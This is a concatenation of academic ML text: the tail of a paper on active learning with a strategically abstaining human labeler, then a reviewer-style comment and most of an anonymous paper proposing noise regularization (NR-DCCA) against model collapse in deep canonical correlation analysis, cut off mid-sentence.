the multi-task query complexity to that of single-task. **Single-task setting:** - **Definition of $S_X^i$:** given queried data $S_X$, define the queried data for task $i$, $S_X^i$, as: $S_X^i = \mathcal{X}_i \setminus (\mathcal{X} \setminus S_X)_i$, where we use the notation that set $Z_i = \{x_i : x \in Z\}$ for $Z \subseteq \mathcal{X}$. In words, $S_X^i$ are examples in $\mathcal{X}_i$ whose label can no longer be obtained. Note that in the multi-task setting, there may exist multiple points that can label some $x_i \in \mathcal{X}_i$. So abstention on one of those points does not necessarily mean that $x_i$ cannot be labeled. **Example:** $\mathcal{X} = \{[x_{11}, x_{12}] \times \{x_{21}, x_{22}\}\}$, then $S_X^i = \{\}$ for $i = 1, 2$. This is because it is still possible for the labeler to give labels on all points, i.e. $x_{11}, x_{22}$ through $[x_{11}, x_{22}]$ and $x_{12}, x_{21}$ through $[x_{12}, x_{21}]$. - **Definition of $V_i$:** given the current multi-task version space $V$, we can naturally define the single-task version space for task $i$ as: $(V)_i = V_i = \{h_i : h \in V\}$ ### 5.1 Upper Bound To understand if multi-task structure can inflate query complexity, we upper bound the multi-task complexity in terms of the sum of the single-task complexities. Proving an upper bound would imply that the labeler cannot increase the query complexity through the multi-task structure. We find that upper bounds only arise under certain regularity assumptions. Thus, we first provide complementary negative results without these assumptions, showing settings where the labeler can amplify the multi-task query complexity. All proofs in this section may be found in Appendix E where we also prove results in the non-abstention setting that may be of independent interest. **Proposition 5.1.** Under both label costs, there exists a non-Cartesian product version space $V \subseteq \mathcal{H}$ and query response $S \subseteq (\mathcal{X} \times \mathcal{Y})^*$ such that $\text{Cost}(V_i, S_X^i) \geq 0$ for all $i$, and: $\text{Cost}(V, S_X) \geq \sum_{i=1}^{n} \text{Cost}(V_i, S_X^i) + n - 1$. Furthermore, we show that if the version space is allowed to be a Cartesian product, and the (more generous) $c_{one}$ is used as label cost, the labeler can still increase the query complexity. **Proposition 5.2.** Assuming the version space is a Cartesian product, under label cost $c_{one}(y) = 1(\exists i, y_i \neq \bot)$, there exists $V$ and $S$ such that $\text{Cost}(V_i, S_X^i) = 1$, but $\text{Cost}(V, S_X) = |\mathcal{X}|$. This implies that: $\text{Cost}(V, S_X) > \sum_{i=1}^{n} \text{Cost}(V_i, S_X^i)$. Thus, for the labeler to be unable to increase multi-task query complexity, two necessary conditions are a) the VS is a cartesian product b) the payoff cost is $c_{alt}$ (and not $c_{one}$). Below, we prove the two conditions are sufficient, providing a full characterization when the upper bound can be achieved. **Theorem 5.3.** For all $V = \times_{i \in [n]} V_i$ and $S_X \subseteq X$, under labeling cost $c_{alt}(y) = 1(\forall i, y_i \neq \bot)$, $$\text{Cost}(V, S_X) \leq \sum_{i=1}^{n} \text{Cost}(V_i, S^i_X).$$ For the remainder of the section, we will prove results under the (more generous) label cost, $c_{one}$. ### 5.2 Lower Bound Through lower bounds, we illustrate that the multi-task version space structure can in fact speed up learning as well. The intuition is that the structure in $V$ may make it so that the multi-task E-VS shrinks faster due to unidentifiability. The following negative example evidences this. **Proposition 5.4.** There exists a non-Cartesian product version space $V$ and query response $S$ such that $\text{Cost}(V_i, S^i_X) \geq 0$ for all $i$, but: $\text{Cost}(V, S_X) < \max_{i \in [n]} \text{Cost}(V_i, S^i_X)$. **Proposition 5.5.** There exists a Cartesian product version space $V$ and query response $S$ with $\text{Cost}(V, S_X) < 0$ such that: $\text{Cost}(V, S_X) < \max_{i \in [n]} \text{Cost}(V_i, S^i_X)$. Thus, we have that identifiability ($\text{Cost}(V, S_X) \geq 0$), and $V$ being a Cartesian product are needed to prove a lower bound. **Theorem 5.6.** For all $V = \times_{i \in [n]} V_i$ and $S_X \subseteq X$, if $\text{Cost}(V, S_X) \geq 0$, then: $\text{Cost}(V, S_X) \geq \max_{i \in [n]} \text{Cost}(V_i, S^i_X)$. ### 6 Related Works The theory of Active Learning (Hanneke, 2009) (AL) has a rich history and began with the study of realizable learning (Angluin, 1988; Hegedüs, 1995; Freund et al., 1997; Dasgupta, 2004; Dasgupta et al., 2005). To the best of our knowledge, we are the first to consider a labeler whose objective is odds with the learner. In face of such a strategic labeler, we develop an active learning algorithm with near-optimal query complexity guarantees. **Abstaining Labeler:** The closest two papers to our work are Yan et al. (2016); Huang et al. (2016), which also study learning from an abstaining labeler. In Yan et al. (2016), the labeler can abstain or noise, where the rate of an incorrect label/abstention is fixed apriori. Our work differs from that of Yan et al. (2016, 2015) in that the labeler can adaptively label (abstain) based on the full interaction history so far, thus allowing for more complex, sequential labeling strategies. In Huang et al. (2016), the labeler abstains when uniformed, and after a number of abstentions in a region, learns to label the region (an “epiphany”). Our setting differs in that the labeler does know the labels for all regions, but instead strategically abstains to increase query complexity. Please see Appendix H for further discussion on related works and on alternative formulations of the learning game, including when the learner is allowed to query an example multiple times. ### 7 Discussion In this paper, we provide the first set of theoretical evidence that labelers can slow down learning through strategic abstentions, making even active learning algorithms sample-inefficient. Motivated by this, we study the learning game involving a strategic labeler, in both the single and multi-task setting. Our theoretical study is motivated by the broader observation that a labeler’s objective may be fundamentally at odds with the learner’s. This conflict in interest arises for instance in AI-automation setting, where workers have the incentive to slow down model training, in order to delay replacement and to maximize compensation for their labeling services before replacement. **Societal/Broader Impact:** Zooming further out, workers have an incentive to slow down training if they lack financial security after being replaced. Indeed, ML offers tremendous potential in bettering our lives, automating away jobs people do not want to do. However, it can also automate away jobs that people do want to do. It is our hope that this paper adds to the important discussion on whether we should always automate, once we have the ability to automate, as well as the discussion on fair labeler compensation during the automation process (De Vynck, 2023). REFERENCES Dana Angluin. Queries and concept learning. *Machine learning*, 2:319–342, 1988. Thor Benson. Your boss’s spyware could train ai to replace you. *Wired*, 2023. URL https://www.wired.com/story/corporate-surveillance-train-ai/ James N Brown and Robert W Rosenthal. Testing the minimax hypothesis: A re-examination of o’neill’s game experiment. *Econometrica: Journal of the Econometric Society*, pp. 1065–1081, 1990. Rui M Castro and Robert D Nowak. Minimax bounds for active learning. *IEEE Transactions on Information Theory*, 54(5):2339–2353, 2008. Yiling Chen, Chara Podimata, Ariel D Procaccia, and Nisarg Shah. Strategyproof linear regression in high dimensions. In *Proceedings of the 2018 ACM Conference on Economics and Computation*, pp. 9–26, 2018. Sanjoy Dasgupta. Analysis of a greedy active learning strategy. *Advances in neural information processing systems*, 17, 2004. Sanjoy Dasgupta, Adam Tauman Kalai, and Claire Monteleoni. Analysis of perceptron-based active learning. In *International conference on computational learning theory*, pp. 249–263. Springer, 2005. Sanjoy Dasgupta, Daniel J Hsu, and Claire Monteleoni. A general agnostic active learning algorithm. *Advances in neural information processing systems*, 20, 2007. Gerrit De Vynck. Ai learned from their work. now they want compensation. *Washington Post*, 2023. URL https://www.washingtonpost.com/technology/2023/07/16/ai-programs-training-lawsuits-fair-use/ Ofer Dekel, Felix Fischer, and Ariel D Procaccia. Incentive compatible regression learning. *Journal of Computer and System Sciences*, 76(8):759–777, 2010. Yoav Freund, H Sebastian Seung, Eli Shamir, and Naftali Tishby. Selective sampling using the query by committee algorithm. *Machine learning*, 28:133–168, 1997. Drew Fudenberg and Luis Rayo. Training and effort dynamics in apprenticeship. *American Economic Review*, 109(11):3780–3812, 2019. Luis Garicano and Luis Rayo. Relational knowledge transfers. *American Economic Review*, 107(9):2695–2730, 2017. Daniel Golovin and Andreas Krause. Adaptive submodularity: A new approach to active learning and stochastic optimization. In *COLT*, pp. 333–345, 2010. Steve Hanneke. The cost complexity of interactive learning. *Unpublished manuscript*, 2006. Steve Hanneke. *Theoretical foundations of active learning*. Carnegie Mellon University, 2009. Steve Hanneke et al. Theory of disagreement-based active learning. *Foundations and Trends® in Machine Learning*, 7(2-3):131–309, 2014. Moritz Hardt, Nimrod Megiddo, Christos Papadimitriou, and Mary Wootters. Strategic classification. In *Proceedings of the 2016 ACM conference on innovations in theoretical computer science*, pp. 111–122, 2016. Tibor Hegedüs. Generalized teaching dimensions and the query complexity of learning. In *Proceedings of the eighth annual conference on Computational learning theory*, pp. 108–117, 1995. Tzu-Kuo Huang, Lihong Li, Ara Vartanian, Saleema Amershi, and Jerry Zhu. Active learning with oracle epiphany. *Advances in neural information processing systems*, 29, 2016. Tom M Mitchell. Generalization as search. *Artificial intelligence*, 18(2):203–226, 1982.
mHv6wcBb0z
The choice of the optimal value for the hyperparameter α in Equation 6 is crucial. If α is set too large, the model may tend to behave like an identity mapping function, potentially reducing its effectiveness. Conversely, if α is too small, the model may not maintain a
PREVENTING MODEL COLLAPSE IN DEEP CANONICAL CORRELATION ANALYSIS BY NOISE REGULARIZATION Anonymous authors Paper under double-blind review ABSTRACT Multi-View Representation Learning (MVRL) aims to learn a unified representation of an object from multi-view data. Deep Canonical Correlation Analysis (DCCA) and its variants share simple formulations and demonstrate state-of-the-art performance. However, with extensive experiments, we observe the issue of model collapse, i.e., the performance of DCCA-based methods will drop drastically when training proceeds. The model collapse issue could significantly hinder the wide adoption of DCCA-based methods because it is challenging to decide when to early stop. To this end, we develop NR-DCCA, which is equipped with a novel noise regularization approach to prevent model collapse. Theoretical analysis shows that the full-rank property of the transformation is the key to preventing model collapse, and our noise regularization constrains the neural network to be “full-rank”. A framework to construct synthetic data with different common and complementary information is also developed to compare MVRL methods comprehensively. The developed NR-DCCA outperforms baselines stably and consistently in both synthetic and real-world datasets, and the proposed noise regularization approach can also be generalized to other DCCA-based methods such as DGCCA. Keywords: Multi-view representation learning; Canonical Correlation Analysis; Deep Canonical Correlation Analysis; Noise regularization; Model collapse 1 INTRODUCTION In recent years, multi-view representation learning (MVRL) has emerged as a core technology for learning from multi-source data and providing readily useful representations to downstream tasks (Sun et al., 2023; Yan et al., 2021), and it has achieved tremendous success in various applications, such as video surveillance (Guo et al., 2015; Feichtenhofer et al., 2016; Deepak, K. et al., 2021), medical diagnosis (Wei et al., 2019; Xu et al., 2020) and social media (Srivastava & Salakhutdinov, 2012; Karpathy & Fei-Fei, 2015; Mao et al., 2014; Fan et al., 2020). Specifically, we collect multi-source data of the same object, and each data source can be regarded as one view of the object. For instance, an object can be described simultaneously through texts, videos, and audio, which contain both common and complementary information of the object (Yan et al., 2021; Zhang et al., 2019b; Hwang et al., 2021; Geng et al., 2021), and the MVRL aims to learn a unified representation of the object from the multi-view data. The key challenge of MVRL is to learn the intricate relationships of different views. The Canonical Correlation Analysis (CCA), which is one of the early and representative methods for MVRL, transforms all the views into a unified space by maximizing their correlations (Hotelling, 1992; Horst, 1961; Hardoon et al., 2004; Lahat et al., 2015; Yan et al., 2023; Sun et al., 2023). Through correlation maximization, CCA can identify the common information between different views and extract them to form the representation of the object. On top of CCA, DCCA further utilizes the powerful deep neural networks (DNNs) to transform each view and then adopts CCA to maximize the correlation of the transformed views (Andrew et al., 2013). Indeed, there are quite a few variants of DCCA, such as DGCCA (Benton et al., 2017), DCCAE (Wang et al., 2015), DVCCA (Wang et al., 2016), DTCCA (Wong et al., 2021) and DCCA_GHA (Chapman et al., 2022). However, with extensive experiments, we observe that the DCCA-based methods generally perform well at the early training stage, while their performance drops drastically when the training proceeds. This issue is referred to as model collapse. Essentially, the model collapse is mainly attributed to the overly powerful transformation abilities of DNNs, and the maximized view correlation may not come from views, but it may come from the model correlation among neural networks, as shown in Figure 1. Although representation produced by DCCA-based methods is naturally full-rank, the feature space may still become degenerated due to unregulated neural networks. In contrast, CCA-based methods utilize linear transformations, which are forced to be full-rank matrices, and hence there is no such model collapse issue. Though early stopping could be adopted to prevent model collapse (Prechelt, 1998; Yao et al., 2007), it remains challenging when to stop. The model collapse issue of DCCA-based methods prevents the adoption in large models, and currently, many applications still use simple concatenation to combine different views (Yan et al., 2021; Zheng et al., 2020; Nie et al., 2017). Therefore, how to develop a DCCA-based MVRL method without model collapse remains an interesting and open question. We prove that the main reason for CCA not having the model collapse issue is that the full-rank property holds in its transformation matrix, while the DNNs in DCCA do not possess such property. To this end, we develop a novel idea that employs noise regularization to enforce the DNNs to be “full-rank”. Note that the proposed noise regularization approach is novel and particularly tailored for DCCA-based methods, which is different from the existing approaches that directly inject noise into the neural networks (Poole et al., 2014; He et al., 2019; Gong et al., 2020). Overall, this paper develops NR-DCCA, a DCCA method equipped with a generalized noise regularization approach. The proposed noise regularization approach constrains the DNNs to be “full-rank”, and it can also be applied to other DCCA-based methods. To justify the approach, the formulation of CCA is analyzed and rigorous proofs are provided. Comprehensive experiments using both synthetic datasets and real-world datasets demonstrate the consistent outperformance and stability of the developed NR-DCCA method. Our contributions are four-fold: - The model collapse issue in DCCA-based methods for MVRL is identified, demonstrated, and explained. - A simple yet effective noise regularization approach is proposed and the NR-DCCA method is developed to prevent model collapse. - Rigorous proofs are provided to demonstrate that the full-rank property of the transformation in the CCA method is the key to preventing model collapse, which justifies the developed noise regularization approach from a theoretical perspective. - A novel framework is proposed to construct synthetic data with different common and complementary information for comprehensively evaluating MVRL methods. 2 RELATED WORKS 2.1 MULTI-VIEW REPRESENTATION LEARNING MVRL aims to uncover relationships among multi-view data in an unsupervised manner, thereby obtaining semantically rich representations that can be utilized for various downstream tasks (Sun A number of works have been proposed to deal with MVRL from different aspects. DMF-MVC (Zhao et al., 2017) utilizes deep matrix factorization to extract a shared representation from multiple views. MDcR (Zhang et al., 2016a) maps each view to a lower-dimensional space and applies kernel matching to enforce dependencies across the views. CPM-Nets (Zhang et al., 2019a) formalizes the concept of partial MVRL and many works have been proposed for such issue (Zhang et al., 2020; Tao et al., 2019; Li et al., 2022; Yin & Sun, 2021). AE²-Nets (Zhang et al., 2019b) utilizes a two-level autoencoder framework to obtain a comprehensive representation of multi-view data. DUA-Nets (Geng et al., 2021) takes a generative modeling perspective and dynamically estimates the weights for different views. MVTCAE (Hwang et al., 2021) explores MVRL from an information-theoretic perspective, which can capture the shared and view-specific factors of variation by maximizing or minimizing specific total correlation. Our work focuses on CCA as a simple, classic, and theoretically sound approach as it can still achieve state-of-the-art performance consistently. 2.2 CCA AND ITS VARIANTS Canonical Correlation Analysis (CCA) projects the multi-view data into a unified space by maximizing their correlations (Hotelling, 1992; Horst, 1961; Hardoon et al., 2004; Lahat et al., 2015; Yan et al., 2023; Sun et al., 2023). It has been widely applied in various scenarios that involve multi-view data, including dimension reduction (Zhang et al., 2016b; Sun et al., 2010a; Avron et al., 2013), classification (Kim et al., 2007; Sun et al., 2010b), and clustering (Fern et al., 2005; Chang & Lin, 2011). To further enhance the nonlinear transformability of CCA, Kernel CCA (KCCA) uses kernel methods, while Deep CCA (DCCA) employs DNNs. Since DNNs is parametric and can take advantage of large amounts of data for training, numerous DCCA-based methods have been proposed. Benton et al. (2017) utilizes DNNs to optimize the objective of Generalized CCA, with the aim of revealing connections between multiple views more effectively. To better preserve view-specific information, Wang et al. (2015) introduces the reconstruction errors of autoencoders to DCCA. Going a step further, Wang et al. (2016) proposes Variational CCA and utilizes dropout and private autoencoders to project common and view-specific information into two distinct spaces. Furthermore, there are many studies exploring efficient methods for computing the correlations between multi-view data when dealing with more than two views such as MCCA, GCCA and TCCA (Horst, 1961; Nielsen, 2002; Kettenring, 1971; Hwang et al., 2021). Some research focuses on improving the efficiency of computing CCA by avoiding the need for singular value decomposition (SVD) (Chang et al., 2018; Chapman et al., 2022). However, the model collapse issue of DCCA-based methods has not been explored and addressed. 2.3 NOISE REGULARIZATION Noise regularization is a pluggable approach to regularize the neural networks during training (Bishop, 1995; An, 1996; Sietsma & Dow, 1991; Gong et al., 2020). In supervised tasks, Sietsma & Dow (1991) might be the first to propose that, by adding noise to the train data, the model will generalize well on new unseen data. Moreover, Bishop (1995); Gong et al. (2020) analyze the mechanism of the noise regularization and He et al. (2019); Gong et al. (2020) indicate that noise regularization can also be used for adversarial training to improve the generalization of the network. In unsupervised tasks, Poole et al. (2014) systematically explores the role of noise injection at different layers in autoencoders, and distinct positions of noise perform specific regularization tasks. However, how to make use of the noise regularization for DCCA-based methods, especially for preventing model collapse, has not been studied. 3 PRELIMINARIES In this section, we will explain the objectives of the MVRL and then introduce CCA and DCCA as representatives of the CCA-based methods and DCCA-based methods, respectively. Lastly, the model collapse issue in DCCA-based methods is demonstrated. 3.1 Settings for MVRL Suppose the set of datasets from $K$ different sources that describe the same object is represented by $X$, and we define $X = \{X_1, \cdots, X_K\}$, $X_k \in \mathbb{R}^{d_k \times n}$, where $x_k$ represents the $k$-th view ($k$-th data source), $n$ is the sample size, and $d_k$ represents the feature dimension for the $k$-th view. And we use $X_k^T$ to denote the transpose of $X_k$. The objective of MVRL is to learn a transformation function $\Psi$ that projects the multi-view data $X$ to a unified representation $Z \in \mathbb{R}^{m \times n}$, where $m$ represents the dimension of the representation space, as shown below: $$Z = \Psi(X) = \Psi(X_1, \cdots, X_K).$$ (1) After applying $\Psi$ for representation learning, we expect that the performance of using $Z$ would be better than directly using $X$ for various downstream tasks. 3.2 Canonical Correlation Analysis Among various MVRL methods, CCA projects the multi-view data into a common space by maximizing their correlations. We first define the correlation between two views as follows: $$\text{Corr}(W_1X_1, W_2X_2) = \text{tr}((\Sigma_{11}^{-1/2}\Sigma_{12}\Sigma_{22}^{-1/2})'(\Sigma_{11}^{-1/2}\Sigma_{12}\Sigma_{22}^{-1/2})^{1/2})$$ (2) where $\text{tr}$ denotes the matrix trace, $\Sigma_{11}$, $\Sigma_{22}$ represent the self-covariance matrices of the projected views, and $\Sigma_{12}$ is the cross-covariance matrix between projected views (D’Agostini, 1994; Andrew et al., 2013). The correlation between the two projected views can be regarded as the sum of all singular values of the normalized cross-covariance (Hotelling, 1992; Anderson et al., 1958). For multiple views, their correlation is defined as the summation of all the pairwise correlations (Nielsen, 2002; Kettenring, 1971), which is shown as follows: $$\text{Corr}(W_1X_1, \cdots, W_kX_k, \cdots, W_KX_K) = \sum_{k<j} \text{Corr}(W_kX_k, W_jX_j).$$ (3) Essentially, CCA searches for the linear transformation matrices $\{W_k\}_k$ that maximize correlation among all the views. Mathematically, it can be represented as: $$\{W_k^*\}_k = \arg\max_{\{W_k\}_k} \text{Corr}(W_1X_1, \cdots, W_kX_k, \cdots, W_KX_K).$$ (4) Once $W_k^*$ is obtained, the multi-view data are projected into a unified space. Lastly, all projected data are concatenated to obtain $Z = [W_1^*X_1; \cdots; W_K^*X_K]$ for downstream tasks. 3.3 DCCA On top of the CCA, DCCA integrates neural networks and CCA to capture the nonlinear relationship among multi-view data. The major difference of DCCA is that the transformation matrix $W_k$ is replaced with multi-layer perceptrons (MLP), and the parameters in MLP are updated through backpropagation (Andrew et al., 2013). Specifically, each $W_k$ is replaced with a neural network $f_k$, which can be viewed as a nonlinear transformation. Similar to CCA, the goal of DCCA is to solve the following optimization problem: $$\{f_k^*\}_k = \arg\max_{\{f_k\}_k} \text{Corr}(f_1(X_1), \cdots, f_k(X_k), \cdots, f_K(X_K)).$$ (5) Again, the unified representation is obtained by $Z = [f_1^*(X_1); \cdots; f_k^*(X_k); \cdots; f_K^*(X_K)]$ for downstream tasks. 3.4 Model Collapse of DCCA Despite exhibiting promising performance, DCCA shows a significant decline in performance as the training proceeds. We attribute this decline-in-performance phenomenon as model collapse. Model collapse could make the performance of DCCA-based methods even worse than classic CCA. methods and simple feature concatenation. As illustrated in (a) of Figure 4, one can see that the performance of DCCA drops drastically during training, though its best performance at early iterations could exceed that of CCA. The correlation between unrelated data increases as the collapsed model transforms any data to a degenerated feature space. In (b) of Figure 4, we can see that except for the proposed method (NR-DCCA), the correlation between unrelated data increases significantly. We could also analyze the model collapse in real-world data by feature visualization as shown in Figure 9 in Appendix A.9. However, it should be noted that the full-rank property of representation always holds for DCCA (verified in Appendix A.6.1), while this cannot prevent the model collapse. Indeed, the model collapse of DCCA is mainly due to the difference between $W_k$ and $f_k$, which requires further investigation. 4 DCCA WITH NOISE REGULARIZATION (NR-DCCA) 4.1 Method In this section, we present NR-DCCA, which makes use of the noise regularization approach to prevent model collapse in DCCA. Indeed, the developed noise regularization approach can be applied to variants of DCCA methods, such as Deep Generalized CCA (DGCCA) (Benton et al., 2017). An overview of the NR-DCCA framework is presented in Figure 2. ![Figure 2: Illustration of NR-DCCA.](image) We take the CUB dataset as an example: similar to DCCA, the $k$-th view $X_k$ is transformed using $f_k$ to obtain new representation $f_k(X_k)$ and then maximize the correlation between new representations. Additionally, for the $k$-th view, we incorporate the proposed NR loss to regularize $f_k$. The key idea in NR-DCCA is to generate a set of i.i.d Gaussian white noise, denoted as $A = \{A_1, \cdots, A_k, \cdots, A_K\}$, $A_k \in \mathbb{R}^{d_k \times n}$, with the same shape as the multi-view data $X_k$. In CCA, the correlation with noise is invariant to the full-rank linear transformation $W_k$: $\text{Corr}(X_k, A_k) = \text{Corr}(W_k X_k, W_k A_k)$ (rigorous proof provided in Proposition 3). However, for DCCA, $\text{Corr}(X_k, A_k)$ might not equal $\text{Corr}(f_k(X_k), f_k(A_k))$ because the powerful neural networks $f_k$ have overfitted to the maximization problem in DCCA and “created” correlation itself. Therefore, we enforce the DCCA to mimic the behavior of CCA by adding a NR loss $\zeta_k = |\text{Corr}(f_k(X_k), f_k(A_k)) - \text{Corr}(X_k, A_k)|$, and hence the formulation of NR-DCCA is: $$\{f^*_k\}_k = \arg \max_{\{f_k\}_k} \text{Corr}(f_1(X_1), \cdots, f_K(X_K)) - \alpha \sum_{k=1}^{K} \zeta_k.$$ (6) where $\alpha$ is the hyper-parameter weighing the NR loss. NR-DCCA can be trained through backpropagation with the randomly generated $A$ in each epoch, and the unified representation is obtained directly using $\{f^*_k\}_k$ in the same manner as DCCA. 4.2 Theoretical analysis In this section, we provide the rationale for why the developed noise regularization can help to prevent model collapse. Without loss of generality, we assume that all the datasets \( X_k \) are zero-centered with respect to row (Hotelling, 1992). Then we make use of the following proposition to simplify our analysis: **Proposition 1** Given a specific matrix \( B \) and a zero-centered \( C \) with respect to rows, the product \( BC \) is also zero-centered with respect to rows. This implies that \( W_k A_k \) and \( W_k X_k \) are both zero-centered matrices. When computing the covariance matrix, there is no need for an additional subtraction of the mean of row, which simplifies our subsequent derivations. We first analyze CCA in detail, and the Moore-Penrose Inverse (MPI) (Petersen et al., 2008) will be used for analysis, and the MPI is defined as follows: **Definition 1** Given a specific matrix \( Y \), its Moore-Penrose Inverse (MPI) is denoted as \( Y^+ \). \( Y^+ \) satisfies: \( YY^+ Y = Y, Y^+ YY^+ = Y^+, YY^+ \) is symmetric, and \( Y^+ Y \) is symmetric. The MPI \( Y^+ \) is unique and always exists for any \( Y \). Furthermore, when matrix \( Y \) is invertible, its inverse matrix \( Y^- \) is exactly \( Y^+ \). Using the definition of MPI, we can rewrite the formulation of CCA. In particular, \( \text{Corr}(\cdot, \cdot) \) can be derived by replacing the inverse with MPI. Using \( \text{Corr}(X_k, A_k) \) as an example, the following proposition holds: **Proposition 2 (MPI-based CCA)** For the \( k \)-th view data \( X_k \) and the Gaussian white noise \( A_k \), we have \[ \text{Corr}(X_k, A_k) = \frac{1}{(n-1)^2} \text{tr}(A_k^+ A_k X_k^+ X_k)^{1/2}, \forall k. \] Utilizing the new form of \( \text{Corr} \), we discover that the transformation matrix \( W_k \) obtained from multi-view data \( X = \{X_1, \cdots, X_k, \cdots, X_K\}, X_k \in \mathbb{R}^{d_k \times n} \) through CCA possesses the following properties: **Proposition 3** For any \( k \), if \( W_k \) is a square and full-rank matrix, the correlation between \( X_k \) and \( A_k \) remains unchanged before and after the transformation by \( W_k \). Mathematically, we have \( \text{Corr}(X_k, A_k) = \text{Corr}(W_k X_k, W_k A_k) \). **Proposition 4** For any \( k \), if \( \text{Corr}(W_k X_k, W_k A_k) = \text{Corr}(X_k, A_k) \) and \( W_k \) is a square matrix, then \( W_k \) must be a full-rank matrix. Proofs of all the above propositions are presented in the Appendix. Combining both Proposition 3 and 4, we have Theorem 1 holds. **Theorem 1 (Full-rank of CCA)** If \( W_k \) is a square matrix for any \( k \), then \( \eta_k = 0 \iff W_k \) is full-rank, where \( \eta_k = |\text{Corr}(W_k X_k, W_k A_k) - \text{Corr}(X_k, A_k)| \). It is widely acknowledged that forced by the loss function, CCA searches for full-rank representation \( W_k X_k \) and thereby obtains a full-rank matrix \( W_k \) (refer to Lemma 2 in Appendix A.3). However, Theorem 1 is profound, as it first time provides the equivalent condition of the full-rank property of \( W_k \) by connecting it to the correlation with noise, and then we can transplant this condition to DCCA. Essentially, CCA searches for \( W_k \) as a full-rank matrix, and it is robust to random noise \( A_k \), given the fact that the correlations between \( X_k \) and \( A_k \) will be invariant to transformation \( W_k \). This indicates the \( W_k \) will not learn to “create” correlation during the maximization process. However, the correlation increases in the DCCA training, which is closely related to the model collapse. We would like the DCCA to hold the same property as CCA, therefore, we define the “full-rank” property for the neural network \( f_k \): **Definition 2 (“Full-rank” of \( f_k \))** Given \( k \), the neural network \( f_k \) is called “full-rank” if \( \zeta_k = 0 \). Based on the Definition 2, the proposed NR-DCCA maximizes the correlation among views and also enforces the neural network to be “full-rank”. As the neural network \( f_k \) shares the same property of the full-rank matrix \( W_k \), the model collapse issue can be eliminated. It should be noted that the “full-rank” property of \( f_k \) is different from the full-rank of the representation \( f_k(X_k) \), as the latter is defined by the matrix rank, while the former one is the new concept in this paper defined by \( \zeta_k = 0 \). 5 Numerical Experiments We conduct extensive experiments on both synthetic and real-world datasets to answer the following research questions: - **RQ1:** How can we construct synthetic datasets to evaluate the MVRL methods in a comprehensive manner? - **RQ2:** Does NR-DCCA avoid model collapse across all synthetic MVRL datasets? - **RQ3:** Does NR-DCCA perform consistently in real-world datasets? We follow the protocol described in Hwang et al. (2021) for evaluating the MVRL methods. For each dataset, we construct a train dataset and a test dataset. All methods are trained in an unsupervised manner on the train dataset. Subsequently, the test dataset is used to obtain the representation, which will be evaluated in downstream tasks. For the regression task, we employ Ridge Regression (Hoerl & Kennard, 1970) and use $R^2$ as the evaluation metric. For the classification task, we use Support Vector Classifier (SVC) (Chang & Lin, 2011) and report the average F1 scores. All tasks are evaluated using 5-fold cross-validation, and the reported results correspond to the average values of the respective metrics. Baseline methods include CONCAT, CCA (Hotelling, 1992), PRCCA (Tuzhilina et al., 2023), KCCA (Akaho, 2006), DCCA (Andrew et al., 2013), DGCCA (Benton et al., 2017), DCCAE/DGCCAE (Wang et al., 2015), DCCA_PRIVATE/DGCCA_PRIVATE (Wang et al., 2016), and MVTCAE (Hwang et al., 2021). Details of the experiment settings including datasets and baselines are presented in Appendix A.5. Hyper-parameter settings, including ridge regularization and $\alpha$ of NR, are discussed in Appendix A.6. We also analyze the computational complexity of different DCCA-based methods in Appendix A.8 and the learned representations are visualized in Appendix A.9. In the main paper, we mainly compare DCCA and NR-DCCA, while the results related to DGCCA are similar and presented in Appendix A.10. 5.1 Construction of Synthetic Datasets (RQ1) We construct synthetic datasets to assess the performance of MVRL methods, and the framework is illustrated in Figure 3. We believe that the multi-view data describes the same object, which is represented by a high-dimensional embedding $G^{d \times n}$, where $d$ is the feature dimension and $n$ is the size of the data, and we call it God Embedding. Each view of data is regarded as a non-linear transformation of part (or all) of $G$. For example, we choose $K = 2$, $d = 100$, and then $X_1 = \phi_1(G[0 : 50 + CR/2, :])$, $X_2 = \phi_2(G[50 - CR/2 : 100], :)$, where $\phi_1$ and $\phi_2$ are non-linear transformations, and $CR$ is referred to as common rate. The common rate is defined as follows: **Definition 3 (Common Rate)** For two view data $X = \{X_1, X_2\}$, common rate is defined as the percentage overlap of the features in $X_1$ and $X_2$ that originate from $G$. One can see that the common rate ranges from 0% to 100%. The larger the value, the greater the correlation between the two views, and a value of 0 indicates that the two views do not share any common dimensions in $G$. Additionally, we construct the downstream tasks by directly transforming the God Embedding $G$. Each task $T_j = \psi_j(G)$, where $\psi_j$ is a transformation, and $T_j$ represents the $j$-th task. By setting different $G$, common rates, $\phi_k$, and $\psi_j$, we can create various synthetic datasets to evaluate the MVRL methods. Finally, $X_k$ are observable to the MVRL methods for learning the representation, and the learned representation will be used to classify/regress $T_j$ to examine the performance of each method. Detailed implementation is given in Appendix A.7. 5.2 Performance on Synthetic Datasets (RQ2) We generate the synthetic datasets with different common rates, and the proposed NR-DCCA and other baseline methods are compared, as presented in (a) of Figure 4. The values depicted in the Figure represent the mean and standard deviation of the performance of methods across datasets. One can see that the DCCA-based methods (e.g., DCCA, DCCAE, DCCA_PRIVATE) will encounter model collapse during the training, and the variance of accuracy also increases. CCA-based methods (CCA and KCCA) demonstrate a stable performance, while the best accuracy is not as good as DCCA-based methods. Our proposed NR-DCCA achieves the state-of-the-art performance as well as training stability to prevent model collapse. Figure 3: Construction of a synthetic dataset. This example consists of 2 views and $n$ objects, and the common rate is 0%. (a) Performance (b) Correlation Figure 4: (a) Mean and standard deviation of the CCA-based method performance across synthetic datasets in different training epochs. (b) The correlation between noise and real data after transformation varies with epochs in different common rate settings for CCA-based methods. Moreover, according to our analysis, the correlation should be invariant if neural networks hold the “full-rank” property. So, after training DCCA, DGCCA, and their NR-variants, we utilize the trained encoders to project the corresponding view data and randomly generated Gaussian white noise and then compute their correlation, as shown in (b) of Figure 4. It can be observed that except for our method (NR-DCCA), as training progresses, other methods increase the correlation between unrelated data. It should be noted that this phenomenon always occurs under any common rates. The performance under different comment rates is inspected separately, as presented in Figure 5. The results at the final epoch are also presented in Table 2 in Appendix A.11. Overall, all the methods demonstrate an improving performance when the common rate increases. DCCA-based methods could achieve similar performance as NR-DCCA, while they collapse drastically when the training proceeds. The NR-DCCA has a consistent outperformance over other methods during the training. Figure 5: Performance of different methods with respect to data with different common rates during the training. Each column represents the testing accuracy of the method at a specific training epoch. An interesting observation is that, most CCA-based methods perform better on data with high common rates, consistent with CCA’s assumption of maximizing the correlation between data from different views. However, this also indicates that their performance may degrade with low correlations among views. 5.3 Consistent Performance on Real-world Datasets (RQ3) We further conduct experiments on three real-world datasets: PolyMnist (Sutter et al., 2021), CUB (Wah et al., 2011), Caltech (Deng et al., 2018). Additionally, we use different numbers of views in PolyMnist. The results are presented in 